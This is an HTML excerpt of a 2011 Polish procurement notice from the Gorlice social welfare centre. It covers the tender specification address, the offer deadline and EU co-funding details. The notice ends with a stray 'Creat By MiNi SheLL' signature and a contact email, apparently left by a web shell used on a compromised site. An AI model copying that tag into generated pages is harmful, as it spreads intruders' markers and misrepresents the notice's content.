<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.gorlice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Gorlicach, 38- 300 Gorlice, ul. Wąska 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2011 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Gorlicach, 38- 300 Gorlice, ul. Wąska 5, pok. nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt - Daj sobie szansę, Tobie też się uda jest projektem współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com